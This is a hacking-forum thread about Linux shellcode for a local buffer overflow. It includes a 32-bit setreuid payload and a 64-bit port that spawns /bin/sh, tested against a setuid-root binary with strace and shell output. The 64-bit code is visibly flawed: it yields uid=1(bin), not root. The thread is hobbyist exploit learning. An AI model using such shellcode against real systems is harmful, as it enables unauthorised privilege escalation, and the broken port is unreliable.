[Shellcode] Wondering if such a (exploit) payload would give you root?

[Short-Circuit]

So say I used this Assembly (Linux 32-BIT NASM) as an exploit payload for a local BoF vulnerability:

Code: [Select]

SEGMENT .text
    global _start
    _start:

    mov al, 70
    xor ebx,ebx
    xor ecx,ecx
    int 80h

    mov al, 1
    inc ebx
    int 80h
Would it give me root?I hand-coded this and I used the syscall for changing uid but Im curious if the uid would stay as 0, when the program exited?


Any ideas? 

[zWaR]

Maybe I'm missing something, but you're saying it's a local vuln, why don't you test it?

What you're trying to do is calling setreuid syscall. Take a look at the following excerpt from its man page:

Code: [Select]

A process with appropriate privileges can set either ID to any value. An unprivileged process can only set the effective user ID if the euid argument is equal to either the real, effective, or saved user ID of the process.
I might be wrong, but this makes me believe that it won't give you what you'd like.

[s3my0n]

I think this will only work if the program you are trying to exploit is owned by root and can be executable by non-root users.

[ca0s]

I think this will only work if the program you are trying to exploit is owned by root and can be executable by non-root users.

And has +s and is not being ptraced.
You cannot simply change your UID to get root,

Did you try to execute it?

Code: [Select]

[ca0s@st4ck-3rr0r Tests]$ strace -e setreuid ./setreuid
[ Process PID=1206 runs in 32 bit mode. ]
setreuid(0, 0)                          = -1 EPERM (Operation not permitted)
syscall_4294967041(0x1, 0, 0x80483d0, 0, 0, 0) = -1 (errno 38)
+++ exited with 0 +++

Then I ported it to 64 bits (my machine is 64 bits and I wanted to execve a 64 executable from the shellcode...)

Code: [Select]

SEGMENT .text
    global main
main:
    mov eax, 113
    xor ebx,ebx
    xor ecx,ecx
    syscall

    jmp str
doeet:
    pop rdi
    mov eax, 59
    syscall

    mov eax, 1
    inc ebx
    syscall
str:
    call doeet
    db '/bin/sh', 0

At first:

Code: [Select]

[ca0s@st4ck-3rr0r Tests]$ ls -la setreuid
-rwxr-xr-x 1 ca0s users 6601 Jan  9 14:10 setreuid
[ca0s@st4ck-3rr0r Tests]$ ./setreuid
[ca0s@st4ck-3rr0r Tests]$ id
uid=1000(ca0s) gid=100(users) groups=100(users),7(lp),92(audio),93(optical),95(storage),98(power),108(vboxusers),1002(bluetooth)

Then:

Code: [Select]

[root@st4ck-3rr0r Tests]# chown root:root setreuid
[root@st4ck-3rr0r Tests]# chmod +s setreuid
[root@st4ck-3rr0r Tests]# ls -la setreuid
-rwsr-sr-x 1 root root 6601 Jan  9 14:10 setreuid

So:

Code: [Select]

[ca0s@st4ck-3rr0r Tests]$ id
uid=1000(ca0s) gid=100(users) groups=100(users),7(lp),92(audio),93(optical),95(storage),98(power),108(vboxusers),1002(bluetooth)
[ca0s@st4ck-3rr0r Tests]$ ./setreuid
setreuid-4.2$ id
uid=1(bin) gid=100(users) groups=1(bin),7(lp),92(audio),93(optical),95(storage),98(power),100(users),108(vboxusers),1002(bluetooth)


[Short-Circuit]

Thanks for testing it, I didnt excpect it to work as it is usually combined with opening a shell session.

Thanks though.And happy shellcoding :3